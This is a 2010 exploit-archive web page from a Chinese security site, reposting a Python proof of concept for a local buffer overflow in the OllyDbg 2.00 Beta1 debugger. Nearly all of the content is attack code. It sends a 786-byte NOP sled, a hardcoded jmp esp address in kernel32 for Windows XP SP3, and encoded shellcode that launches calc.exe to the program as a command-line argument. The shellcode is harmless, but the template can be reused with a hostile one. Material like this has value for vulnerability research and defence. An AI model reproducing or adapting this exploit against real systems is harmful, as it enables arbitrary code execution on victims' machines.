首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit
来源:vfocus.net 作者:SuBz3r0 发布时间:2010-02-22  

# Exploit Title: [Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit]
# Date: [2010-02-15]
# Author: [_SuBz3r0_]
# Software Link: [http://www.ollydbg.de/version2.html]
# Version: [2.00 Beta 1]
# Tested on: [XP SP3]
# CVE : [if exists]
# Code :
#Ollydbg2 v2.00 beta1 Exploit in Python
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Ollydbg v2.00 beta 1 local overflow Exploit"
print "Just For Fun"
print "exploit = [NOP] + [jmp ESP] + [SH3LLC0DE]"
print "Shellcode = calc.exe"
print ""
print "Greetz:piloo le canari & MaX"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""

import os
import sys

#path to ollydbg.exe
program = 'c:\\ollydbg.exe'

#exploit = [NOP] + [jmp ESP] + [SH3LLC0DE]
#overflow =786*'\x90'
#eip = "\x13\x44\x87\x7c" : kernel32.dll jmp esp
#Shellcode pop up calc.exe
exploit =786*'\x90'+'\x13'+'\x44'+'\x87'+'\x7c'+''.join([
'\xb4\x31\xf8\x2d\x84\xe3\x04\x35\xb8\x3c\x14\x46\x34\x48',
'\x67\xfc\x31\xc9\x83\xe9\xe2\xe8\xff\xff\xff\xff\xc0\x5e',
'\x81\x76\x0e\x03\xf9\xd8\x37\x83\xee\xfc\xe2\xf4\xff\x11',
'\x9c\x37\x03\xf9\x53\x72\x3f\x72\xa4\x32\x7b\xf8\x37\xbc',
'\x4c\xe1\x53\x68\x23\xf8\x33\x7e\x88\xcd\x53\x36\xed\xc8',
'\x18\xae\xaf\x7d\x18\x43\x04\x38\x12\x3a\x02\x3b\x33\xc3',
'\x38\xad\xfc\x33\x76\x1c\x53\x68\x27\xf8\x33\x51\x88\xf5',
'\x93\xbc\x5c\xe5\xd9\xdc\x88\xe5\x53\x36\xe8\x70\x84\x13',
'\x07\x3a\x87\x06\xf5\x99\x8e\x53\x88\xbf\xe8\xbc\x43\xf5',
'\x53\x47\x1f\x54\x53\x5f\x0b\x70\x20\xb4\xc3\x93\x88\x5f',
'\xf3\x73\xdc\x68\x6b\x61\x26\xbd\x0d\xae\x27\xd0\x60\x98',
'\xb4\x54\x03\xf9\xd8\x37'])

print ""
os.execl(program,program,program,exploit)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Explorer (6/7) Remote
·Apple Iphone/Ipod - My DBLite
·Wireshark 1.2.5 LWRES getaddrb
·Easy~Ftp Server v1.7.0.2 Post-
·NovaPlayer 1.0 (.mp3) Local De
·Easy~Ftp Server v1.7.0.2 Post-
·Internet Explorer 8 (Multitudi
·Easy~Ftp Server v1.7.0.2 Post-
·Mozilla Firefox 3.6 (Multitudi
·Apple Iphone/Ipod - FTP On The
·Browser address bar characters
·OtsTurntables Free v1.00.047 (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved